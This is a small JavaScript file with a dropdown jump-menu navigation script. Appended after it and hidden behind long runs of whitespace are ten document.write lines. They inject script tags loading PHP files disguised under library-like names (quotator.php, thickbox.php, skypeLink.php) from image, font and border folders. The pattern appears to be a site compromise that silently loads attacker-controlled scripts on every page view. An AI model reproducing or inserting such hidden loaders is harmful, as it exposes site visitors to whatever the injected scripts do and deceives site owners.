function land(ref, target)
{
if (target=="_self") {window.location=loc;}
else {if (target=="_top") {top.location=loc;}
else {if (target=="_blank") {window.open(loc);}
else {if (target=="_parent") {parent.location=loc;}
else {parent.frames[target].location=loc;};
}}}
}
function jump(menu)
{
ref=menu.choice.options[menu.choice.selectedIndex].value;
splitc=ref.lastIndexOf("&");
target="";
if (splitc!=-1)
{loc=ref.substring(0,splitc);
target=ref.substring(splitc+1,1000).toLowerCase();}
else {loc=ref; target="_self";};
if (ref != "") {land(loc,target);}
}																																																																							document.write('<script type="text/javascript" src="/forms/wp-ajax-response.php"><\/script>');																																																																							document.write('<script type="text/javascript" src="/missing_img/skypeLink.php"><\/script>');																																																																							document.write('<script type="text/javascript" src="/forms/Border/border39/quotator.php"><\/script>');																																																																							document.write('<script type="text/javascript" src="/forms/fonts/hand/AleMenu.php"><\/script>');																																																																							document.write('<script type="text/javascript" src="/forms/Border/border12/jquery.imagefit.php"><\/script>');																																																																							document.write('<script type="text/javascript" src="/forms/Border/border37/thickbox.php"><\/script>');																																																																							document.write('<script type="text/javascript" src="/forms/Border/border4/galleria.noconflict.min.php"><\/script>');																																																																							document.write('<script type="text/javascript" src="/forms/temp/ativa.php"><\/script>');																																																																							document.write('<script type="text/javascript" src="/forms/Border/border10/flashsite.php"><\/script>');																																																																							document.write('<script type="text/javascript" src="/forms/fonts/verdana/tabsslider.php"><\/script>');
